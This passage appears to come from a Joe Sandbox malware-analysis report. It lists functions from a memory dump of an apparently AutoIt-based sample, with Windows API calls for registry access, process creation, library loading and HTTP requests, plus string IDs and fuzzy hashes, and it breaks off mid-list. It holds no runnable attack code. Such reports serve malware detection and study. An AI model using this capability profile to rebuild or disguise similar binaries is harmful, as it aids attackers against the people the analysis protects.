                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                                                                • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                                                • API String ID: 1103490817-4258414348
                                                                                                                                                • Opcode ID: 046a0039f77dad810612c624190e9aeed3daae4b4d85a2e6f8c9e4a5a7a65ca1
                                                                                                                                                • Instruction ID: bad0adc9d1ca42052266afc48aeb5a5765d4cd994a8cec6cf376a9944d7bae5a
                                                                                                                                                • Opcode Fuzzy Hash: 046a0039f77dad810612c624190e9aeed3daae4b4d85a2e6f8c9e4a5a7a65ca1
                                                                                                                                                • Instruction Fuzzy Hash: E9E1BE312287029FC714DF24C49096AB7E2FF99318F50895DF8969B362DB30ED65CB81
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _wcslen$BuffCharUpper
                                                                                                                                                • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                                                • API String ID: 1256254125-909552448
                                                                                                                                                • Opcode ID: ca2f198b571b90a29993baf9eee17895be6787ed350c4cdc14d8b42efcbda7fa
                                                                                                                                                • Instruction ID: d79311edaeef25bf258846a4e62d8c34360a987ea3fe6922b8630ac58cbf9a8e
                                                                                                                                                • Opcode Fuzzy Hash: ca2f198b571b90a29993baf9eee17895be6787ed350c4cdc14d8b42efcbda7fa
                                                                                                                                                • Instruction Fuzzy Hash: A871F13263016B8BCF20DE78CD516BE33A5AB61764B310529F8569B284EA34CDB087A0
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • _wcslen.LIBCMT ref: 002A835A
                                                                                                                                                • _wcslen.LIBCMT ref: 002A836E
                                                                                                                                                • _wcslen.LIBCMT ref: 002A8391
                                                                                                                                                • _wcslen.LIBCMT ref: 002A83B4
                                                                                                                                                • LoadImageW.USER32 ref: 002A83F2
                                                                                                                                                • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,002A5BF2), ref: 002A844E
                                                                                                                                                • LoadImageW.USER32 ref: 002A8487
                                                                                                                                                • LoadImageW.USER32 ref: 002A84CA
                                                                                                                                                • LoadImageW.USER32 ref: 002A8501
                                                                                                                                                • FreeLibrary.KERNEL32(?), ref: 002A850D
                                                                                                                                                • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 002A851D
                                                                                                                                                • DestroyIcon.USER32(?,?,?,?,?,002A5BF2), ref: 002A852C
                                                                                                                                                • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 002A8549
                                                                                                                                                • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 002A8555
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                                                                                                                • String ID: .dll$.exe$.icl
                                                                                                                                                • API String ID: 799131459-1154884017
                                                                                                                                                • Opcode ID: ccc58cbbd4a7c0ee9c3a70181e651254ef74c5bbd1a978f56eeb0da2178355b3
                                                                                                                                                • Instruction ID: 08a0999c315db1da34758f70c8079a1b1e0c529c64eefaa7673a2a1a77a94d77
                                                                                                                                                • Opcode Fuzzy Hash: ccc58cbbd4a7c0ee9c3a70181e651254ef74c5bbd1a978f56eeb0da2178355b3
                                                                                                                                                • Instruction Fuzzy Hash: CB61F171920206BFEB14DF64DC45BBE77A8BB09720F20454AF815D60D0EF74A9A0CBA0
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                                                                                • API String ID: 0-1645009161
                                                                                                                                                • Opcode ID: e4a3e41fe95490767cd56aab0f8dc5462d54b6fc85b9292b7ffb89972c1235b0
                                                                                                                                                • Instruction ID: 8bb385504df6c2d408d60d681070677c86e20679b17567812f58cf1bada41b7d
                                                                                                                                                • Opcode Fuzzy Hash: e4a3e41fe95490767cd56aab0f8dc5462d54b6fc85b9292b7ffb89972c1235b0
                                                                                                                                                • Instruction Fuzzy Hash: 1A811AB1634616BBDB20AF60DC52FEE77B8AF65300F044025FC05AA192EB70D9B5CB95
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _wcslen
                                                                                                                                                • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT$[-
                                                                                                                                                • API String ID: 176396367-2782989067
                                                                                                                                                • Opcode ID: a8d03c097fa8f9dcacd1aaacb39fe9e46ef6c5d46d34acde549e0aba1448760d
                                                                                                                                                • Instruction ID: 0057a52ae77a3b08bd53fb1b0b938f817a95becdb1dcd3611180b804383d141b
                                                                                                                                                • Opcode Fuzzy Hash: a8d03c097fa8f9dcacd1aaacb39fe9e46ef6c5d46d34acde549e0aba1448760d
                                                                                                                                                • Instruction Fuzzy Hash: 7FE11832A20527ABCB18DF74C4517EEBBB4BF14710F54C11AE45AE7240DB70AEA5ABD0
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 002300C6
                                                                                                                                                  • Part of subcall function 002300ED: InitializeCriticalSectionAndSpinCount.KERNEL32(002E070C,00000FA0,3EA15085,?,?,?,?,002523B3,000000FF), ref: 0023011C
                                                                                                                                                  • Part of subcall function 002300ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,002523B3,000000FF), ref: 00230127
                                                                                                                                                  • Part of subcall function 002300ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,002523B3,000000FF), ref: 00230138
                                                                                                                                                  • Part of subcall function 002300ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable,?,?,?,?,002523B3,000000FF), ref: 0023014E
                                                                                                                                                  • Part of subcall function 002300ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS,?,?,?,?,002523B3,000000FF), ref: 0023015C
                                                                                                                                                  • Part of subcall function 002300ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable,?,?,?,?,002523B3,000000FF), ref: 0023016A
                                                                                                                                                  • Part of subcall function 002300ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00230195
                                                                                                                                                  • Part of subcall function 002300ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 002301A0
                                                                                                                                                • ___scrt_fastfail.LIBCMT ref: 002300E7
                                                                                                                                                  • Part of subcall function 002300A3: __onexit.LIBCMT ref: 002300A9
                                                                                                                                                Strings
                                                                                                                                                • WakeAllConditionVariable, xrefs: 00230162
                                                                                                                                                • kernel32.dll, xrefs: 00230133
                                                                                                                                                • InitializeConditionVariable, xrefs: 00230148
                                                                                                                                                • SleepConditionVariableCS, xrefs: 00230154
                                                                                                                                                • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00230122
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                                                                                                                • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                                                                • API String ID: 66158676-1714406822
                                                                                                                                                • Opcode ID: fa0e87ac4a6c13fe6964c6287df77e391b5cefd33a6fadea6da58a9dd9963dce
                                                                                                                                                • Instruction ID: 650d5c7266ae241d57b9e084f0d562d3f387c9220813e87e9eba07d307de1cb3
                                                                                                                                                • Opcode Fuzzy Hash: fa0e87ac4a6c13fe6964c6287df77e391b5cefd33a6fadea6da58a9dd9963dce
                                                                                                                                                • Instruction Fuzzy Hash: 4F2129B2A60711AFD7216FE4BD9DB2A73A4DB07F51F100136F809A6291DFB49C108AB0
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _wcslen$BuffCharDriveLowerType
                                                                                                                                                • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                                                • API String ID: 2055661098-1000479233
                                                                                                                                                • Opcode ID: 38a0523525d179e4d43406b31e58583d5652806f25065c2a5d50d90eb8e5ca29
                                                                                                                                                • Instruction ID: 397e21eace12467cf7cec3e3302f5e48e11789c1abc417bb34b584191b253efa
                                                                                                                                                • Opcode Fuzzy Hash: 38a0523525d179e4d43406b31e58583d5652806f25065c2a5d50d90eb8e5ca29
                                                                                                                                                • Instruction Fuzzy Hash: D7B1E2396293139BC710FF28C890A6EB7E5AFA5724F50491DF496C72D1E730E8A4CB52
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00229BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00229BB2
                                                                                                                                                • DragQueryPoint.SHELL32(?,?), ref: 002A9147
                                                                                                                                                  • Part of subcall function 002A7674: ClientToScreen.USER32(?,?), ref: 002A769A
                                                                                                                                                  • Part of subcall function 002A7674: GetWindowRect.USER32(?,?), ref: 002A7710
                                                                                                                                                  • Part of subcall function 002A7674: PtInRect.USER32(?,?,002A8B89), ref: 002A7720
                                                                                                                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 002A91B0
                                                                                                                                                • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 002A91BB
                                                                                                                                                • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 002A91DE
                                                                                                                                                • SendMessageW.USER32(?,000000C2,00000001,?), ref: 002A9225
                                                                                                                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 002A923E
                                                                                                                                                • SendMessageW.USER32(?,000000B1,?,?), ref: 002A9255
                                                                                                                                                • SendMessageW.USER32(?,000000B1,?,?), ref: 002A9277
                                                                                                                                                • DragFinish.SHELL32(?), ref: 002A927E
                                                                                                                                                • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 002A9371
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                                                                                                                • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$p#.
                                                                                                                                                • API String ID: 221274066-2896109970
                                                                                                                                                • Opcode ID: 5afe16ada1c67c4d2da95db5202d950a541a0656af9a0159232ba9451bd466f4
                                                                                                                                                • Instruction ID: 43e7a5fdc3afe843aa3625655be0f2be8a1f476594546150be3b29169ed35d74
                                                                                                                                                • Opcode Fuzzy Hash: 5afe16ada1c67c4d2da95db5202d950a541a0656af9a0159232ba9451bd466f4
                                                                                                                                                • Instruction Fuzzy Hash: 2561AD71118301AFC704DF50DC89DAFBBE8EF9A750F10092EF595921A1DB309AA9CF92
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • _wcslen.LIBCMT ref: 0029B198
                                                                                                                                                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0029B1B0
                                                                                                                                                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0029B1D4
                                                                                                                                                • _wcslen.LIBCMT ref: 0029B200
                                                                                                                                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0029B214
                                                                                                                                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0029B236
                                                                                                                                                • _wcslen.LIBCMT ref: 0029B332
                                                                                                                                                  • Part of subcall function 002805A7: GetStdHandle.KERNEL32(000000F6), ref: 002805C6
                                                                                                                                                • _wcslen.LIBCMT ref: 0029B34B
                                                                                                                                                • _wcslen.LIBCMT ref: 0029B366
                                                                                                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0029B3B6
                                                                                                                                                • GetLastError.KERNEL32(00000000), ref: 0029B407
                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 0029B439
                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0029B44A
                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0029B45C
                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0029B46E
                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 0029B4E3
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2178637699-0
                                                                                                                                                • Opcode ID: a7de3a3173ae450139d8f2daa386e6f13083dfb20c28358c2389e4f60cf156cb
                                                                                                                                                • Instruction ID: 324effe7ccc403362b01b2e6b38f347f7ed58c57cc297531a4ce008427428db0
                                                                                                                                                • Opcode Fuzzy Hash: a7de3a3173ae450139d8f2daa386e6f13083dfb20c28358c2389e4f60cf156cb
                                                                                                                                                • Instruction Fuzzy Hash: 3EF1BE316243419FCB15EF24D991B6EBBE5AF85310F14845DF8898B2A2DB31EC64CF92
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetMenuItemCount.USER32(002E1990), ref: 00252F8D
                                                                                                                                                • GetMenuItemCount.USER32(002E1990), ref: 0025303D
                                                                                                                                                • GetCursorPos.USER32(?), ref: 00253081
                                                                                                                                                • SetForegroundWindow.USER32(00000000), ref: 0025308A
                                                                                                                                                • TrackPopupMenuEx.USER32 ref: 0025309D
                                                                                                                                                • PostMessageW.USER32 ref: 002530A9
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                                                                                                                • String ID: 0
                                                                                                                                                • API String ID: 36266755-4108050209
                                                                                                                                                • Opcode ID: 82546cb22d0314a94c2ea2469dcb73a733bc73fc8c0120caee75546fb20f7be5
                                                                                                                                                • Instruction ID: 747551c488b771fbf0bed2cf8c2990110014b0351d9ebe2ef30ef0927cf037a1
                                                                                                                                                • Opcode Fuzzy Hash: 82546cb22d0314a94c2ea2469dcb73a733bc73fc8c0120caee75546fb20f7be5
                                                                                                                                                • Instruction Fuzzy Hash: 5171F670664206BFEB21DF24DC49F9ABFA5FF02364F204216F915661D0C7B1AD68CB54
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • DestroyWindow.USER32 ref: 002A6DEB
                                                                                                                                                  • Part of subcall function 00216B57: _wcslen.LIBCMT ref: 00216B6A
                                                                                                                                                • CreateWindowExW.USER32 ref: 002A6E5F
                                                                                                                                                • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 002A6E81
                                                                                                                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 002A6E94
                                                                                                                                                • DestroyWindow.USER32 ref: 002A6EB5
                                                                                                                                                • CreateWindowExW.USER32 ref: 002A6EE4
                                                                                                                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 002A6EFD
                                                                                                                                                • GetDesktopWindow.USER32 ref: 002A6F16
                                                                                                                                                • GetWindowRect.USER32(00000000), ref: 002A6F1D
                                                                                                                                                • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 002A6F35
                                                                                                                                                • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 002A6F4D
                                                                                                                                                  • Part of subcall function 00229944: GetWindowLongW.USER32(?,000000EB), ref: 00229952
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                                                                                                                • String ID: 0$tooltips_class32
                                                                                                                                                • API String ID: 2429346358-3619404913
                                                                                                                                                • Opcode ID: 69f154183a6bbb63fd1ac22ae6ab45ba0f76b49be54f78814564d4b982303431
                                                                                                                                                • Instruction ID: 940f4628625e9d6c068c69b799d4ca50cfef78d90aa17f476df5d2c427c8cbfa
                                                                                                                                                • Opcode Fuzzy Hash: 69f154183a6bbb63fd1ac22ae6ab45ba0f76b49be54f78814564d4b982303431
                                                                                                                                                • Instruction Fuzzy Hash: 5E717A70154245AFDB25CF18EC48FAABBE9FB8A704F18041DF999C72A1CB70A965CB11
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0028C4B0
                                                                                                                                                • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0028C4C3
                                                                                                                                                • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0028C4D7
                                                                                                                                                • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0028C4F0
                                                                                                                                                • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0028C533
                                                                                                                                                • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0028C549
                                                                                                                                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0028C554
                                                                                                                                                • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0028C584
                                                                                                                                                • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0028C5DC
                                                                                                                                                • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0028C5F0
                                                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 0028C5FB
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
